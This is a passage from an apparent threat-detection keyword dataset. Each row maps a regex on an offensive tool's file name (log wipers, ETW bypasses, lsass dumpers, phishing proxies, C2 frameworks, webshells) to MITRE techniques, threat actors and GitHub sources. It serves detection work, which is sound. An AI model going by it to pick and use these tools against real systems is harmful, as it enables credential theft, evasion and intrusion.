T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15295" "*\EnumerateDCs.ahk*",".{0,1000}\\EnumerateDCs\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15296" "*\enumeration_process.exe*",".{0,1000}\\enumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15297" "*\erawtfoS\UCKH*",".{0,1000}\\erawtfoS\\UCKH.{0,1000}","offensive_tool_keyword","powershell","reverse string registry pattern","T1059","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A","15306" "*\ES.Alan.Core*",".{0,1000}\\ES\.Alan\.Core.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","15307" "*\esentutl.py*",".{0,1000}\\esentutl\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15308" "*\EternalHushCore.dll*",".{0,1000}\\EternalHushCore\.dll.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","15309" "*\EternalHushCore\*",".{0,1000}\\EternalHushCore\\.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","15310" "*\ethminer.exe*",".{0,1000}\\ethminer\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","15311" "*\etw-fuck.cpp*",".{0,1000}\\etw\-fuck\.cpp.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","15312" "*\etw-fuck.exe*",".{0,1000}\\etw\-fuck\.exe.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","15313" "*\ETWHash.*",".{0,1000}\\ETWHash\..{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","15314" "*\ETWpatch\eventK.exe*",".{0,1000}\\ETWpatch\\eventK\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - 
T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15315" "*\etwunhook.cpp*",".{0,1000}\\etwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","15316" "*\etwunhook.exe*",".{0,1000}\\etwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","15317" "*\Evasion\Sandbox Evasion\*.c*",".{0,1000}\\Evasion\\Sandbox\sEvasion\\.{0,1000}\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","15318" "*\Evasion\Sandbox Evasion\*.exe*",".{0,1000}\\Evasion\\Sandbox\sEvasion\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - 
TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","15319" "*\EventCleaner.cpp*",".{0,1000}\\EventCleaner\.cpp.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15320" "*\EventCleaner.exe*",".{0,1000}\\EventCleaner\.exe.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15321" "*\EventCleaner.log*",".{0,1000}\\EventCleaner\.log.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15322" "*\EventCleaner.pdb*",".{0,1000}\\EventCleaner\.pdb.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15323" "*\EventCleaner.sln*",".{0,1000}\\EventCleaner\.sln.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15324" 
"*\EventCleaner-master*",".{0,1000}\\EventCleaner\-master.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","15325" "*\EventLogCrasher\*",".{0,1000}\\EventLogCrasher\\.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","15327" "*\EventLogCredentials.ps1*",".{0,1000}\\EventLogCredentials\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","15328" "*\Eventlogedit-evtx--Evolution-master-v1.1*",".{0,1000}\\Eventlogedit\-evtx\-\-Evolution\-master\-v1\.1.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","15329" "*\EventLogMaster.cna*",".{0,1000}\\EventLogMaster\.cna.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","15330" 
"*\EventLogMaster-master*",".{0,1000}\\EventLogMaster\-master.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","15331" "*\EventViewer-UACBypass*",".{0,1000}\\EventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","15332" "*\evi1m0.bat*",".{0,1000}\\evi1m0\.bat.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15333" "*\evil.dll*",".{0,1000}\\evil\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","15334" "*\evil.dll*",".{0,1000}\\evil\.dll.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","15335" "*\evil.ps1*",".{0,1000}\\evil\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15336" "*\evil.ps1*",".{0,1000}\\evil\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15337" "*\evil_pdf\*",".{0,1000}\\evil_pdf\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","15338" 
"*\evil_script.py*",".{0,1000}\\evil_script\.py.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","15339" "*\evil_script.py*",".{0,1000}\\evil_script\.py.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15340" "*\evil32.dll*",".{0,1000}\\evil32\.dll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","15341" "*\evil64.dll*",".{0,1000}\\evil64\.dll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. 
It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","15342" "*\EvilClippy*",".{0,1000}\\EvilClippy.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","15343" "*\EvilClippy-*.zip*",".{0,1000}\\EvilClippy\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","15344" "*\evilclippy.cs*",".{0,1000}\\evilclippy\.cs.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","15345" "*\evilginx2\*",".{0,1000}\\evilginx2\\.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing 
for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","15346" "*\EvilLsassTwin\*",".{0,1000}\\EvilLsassTwin\\.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","15347" "*\EvilnoVNC*",".{0,1000}\\EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","15348" "*\evil-proxy.rb*",".{0,1000}\\evil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","15349" "*\evil-proxy\*",".{0,1000}\\evil\-proxy\\.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","15350" "*\evilrdp\*",".{0,1000}\\evilrdp\\.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 
- T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","15351" "*\evilscript.ps1*",".{0,1000}\\evilscript\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15352" "*\evilscript.ps1*",".{0,1000}\\evilscript\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15353" "*\evilSignatures.db*",".{0,1000}\\evilSignatures\.db.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","15354" "*\EvilSln\*.suo*",".{0,1000}\\EvilSln\\.{0,1000}\.suo.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","0","N/A","N/A","10","","N/A","","","","15355" 
"*\evtDeleteRecordbyGetHandle.cpp*",".{0,1000}\\evtDeleteRecordbyGetHandle\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15356" "*\evtDeleteRecordbyGetHandle.exe*",".{0,1000}\\evtDeleteRecordbyGetHandle\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15357" "*\evtDeleteRecordofFile.cpp*",".{0,1000}\\evtDeleteRecordofFile\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15358" "*\evtDeleteRecordofFile.exe*",".{0,1000}\\evtDeleteRecordofFile\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15359" "*\evtModifyRecordbyGetHandle.cpp*",".{0,1000}\\evtModifyRecordbyGetHandle\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15360" "*\evtModifyRecordbyGetHandle.exe*",".{0,1000}\\evtModifyRecordbyGetHandle\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15361" "*\evtQueryRecordbyGetHandle.cpp*",".{0,1000}\\evtQueryRecordbyGetHandle\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15362" "*\evtQueryRecordbyGetHandle.exe*",".{0,1000}\\evtQueryRecordbyGetHandle\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15363" "*\ew.exe -s rssocks*",".{0,1000}\\ew\.exe\s\-s\srssocks.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - 